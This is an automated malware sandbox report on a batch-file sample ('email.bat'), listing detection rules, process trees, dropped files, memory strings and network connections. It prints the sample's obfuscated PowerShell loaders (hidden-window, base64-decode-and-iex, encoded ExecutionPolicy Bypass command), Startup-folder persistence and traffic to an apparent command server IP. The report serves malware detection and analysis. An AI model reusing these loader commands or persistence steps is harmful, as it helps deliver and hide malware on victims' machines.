ParentProcessName: cmd.exe, ProcessCommandLine: pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=, ProcessId: 7380, ProcessName: powershell.exe
              Sigma detected: Dynamic CSharp Compile Artefact
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2908, TargetFilename: C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine|base64offset|contains: <!., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ProcessId: 2908, ProcessName: powershell.exe
              Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2908, TargetFilename: C:\Users\user\AppData\Local\Phantom.ps1

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\explorer.exe, ProcessId: 2580, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DkkijTOJSHGJxxcmgeA.bat
              Sigma detected: Powershell Decrypt And Execute Base64 Data
              Source: Process startedAuthor: Joe Security: Data: Command: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", CommandLine|base64offset|contains: <!., Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\email.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 560, ParentProcessName: cmd.exe, ProcessCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ProcessId: 2908, ProcessName: powershell.exe
              Sigma detected: Dot net compiler compiles file from suspicious location
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline", ProcessId: 2720, ProcessName: csc.exe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: email.batVirustotal: Detection: 11%Perma Link
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdb source: powershell.exe, 00000002.00000002.2227274185.000001DC2D7E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdb source: powershell.exe, 00000002.00000002.1839501596.000001DC185B8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdbhP source: powershell.exe, 00000002.00000002.1839501596.000001DC185B8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Net_Loader\Net_Loader\obj\Release\Net_Loader.pdb source: PING.EXE, 0000000A.00000002.2229017631.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2508310620.00000000069F0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Startup\Startup\obj\x64\Release\Startup.pdb source: explorer.exe, 00000006.00000002.2940202775.0000000010881000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdbH source: powershell.exe, 00000002.00000002.2227274185.000001DC2D7E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: .C:\Users\user\AppData\Local\Temp\zozwmnym.pdb source: powershell.exe, 00000012.00000002.1992910476.0000026212AA9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: .C:\Users\user\AppData\Local\Temp\zozwmnym.pdbhP source: powershell.exe, 00000012.00000002.1992910476.0000026212AA9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\zozwmnym.pdb& source: powershell.exe, 00000012.00000002.2273172978.0000026228BF3000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

              Networking

              barindex
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE C:\WIndows\SysWOW64\PING.EXE 127.0.0.1 -t
              Source: global trafficTCP traffic: 192.168.2.4:49734 -> 213.209.150.200:9874
              Source: unknownDNS traffic detected: query: 34.26.8.0.in-addr.arpa replaycode: Name error (3)
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: unknownTCP traffic detected without corresponding DNS query: 213.209.150.200
              Source: global trafficDNS traffic detected: DNS query: 34.26.8.0.in-addr.arpa
              Source: explorer.exe, 00000006.00000002.2927964458.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: explorer.exe, 00000006.00000002.2927964458.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
              Source: explorer.exe, 00000006.00000002.2927964458.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
              Source: PING.EXE, 0000000A.00000003.2058733611.0000000007705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.
              Source: PING.EXE, 0000000A.00000003.2058733611.0000000007705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft./fw
              Source: powershell.exe, 00000002.00000002.1957620691.000001DC25492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: explorer.exe, 00000006.00000002.2927964458.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1731694645.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: explorer.exe, 00000006.00000000.1730178532.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
              Source: powershell.exe, 00000002.00000002.1839501596.000001DC16A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
              Source: explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
              Source: explorer.exe, 00000006.00000002.2925943311.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.2926818272.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1732389205.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
              Source: powershell.exe, 00000002.00000002.1839501596.000001DC15421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303082836.000002B4619C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1992910476.0000026210A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: PING.EXE, 0000000A.00000002.2194405756.000000000554C000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005594000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005575000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005541000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000003.2076527414.00000000076CA000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005556000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000557F000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000558D000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005564000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000002.00000002.1839501596.000001DC16A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: explorer.exe, 00000006.00000002.2933549368.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1734959989.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: powershell.exe, 00000012.00000002.2278789972.0000026228DE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: explorer.exe, 00000006.00000000.1734959989.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2933549368.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
              Source: explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
              Source: explorer.exe, 00000006.00000000.1730178532.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
              Source: powershell.exe, 00000002.00000002.1839501596.000001DC15421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303082836.000002B461989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2303082836.000002B46199D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1992910476.0000026210A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: explorer.exe, 00000006.00000002.2933549368.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1734959989.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
              Source: explorer.exe, 00000006.00000002.2920165193.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1728875107.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
              Source: explorer.exe, 00000006.00000000.1731694645.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2927964458.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
              Source: PING.EXE, 0000000A.00000002.2194405756.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
              Source: explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
              Source: explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
              Source: explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
              Source: explorer.exe, 00000006.00000000.1730178532.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
              Source: explorer.exe, 00000006.00000000.1730178532.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2924016491.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
              Source: explorer.exe, 00000006.00000002.2924016491.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1730178532.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
              Source: powershell.exe, 00000002.00000002.1957620691.000001DC25492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000002.00000002.1957620691.000001DC25492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000002.00000002.1957620691.000001DC25492000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: PING.EXE, 00000017.00000002.2494654093.000000000478C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: explorer.exe, 00000006.00000002.2933549368.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1734959989.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
              Source: PING.EXE, 0000000A.00000002.2194405756.000000000554C000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005594000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005575000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005541000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005556000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000557F000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000558D000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005564000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Azure/azure-storage-cpp)
              Source: PING.EXE, 0000000A.00000002.2194405756.000000000554C000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005594000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005575000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000003.2076361864.0000000007705000.00000004.00000020.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005541000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005556000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000557F000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000558D000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.0000000005564000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2194405756.000000000556E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Microsoft/cpprestsdk)
              Source: powershell.exe, 00000002.00000002.1839501596.000001DC16A75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: PING.EXE, 0000000A.00000002.2220634073.0000000006121000.00000004.00000800.00020000.00000000.sdmp, PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
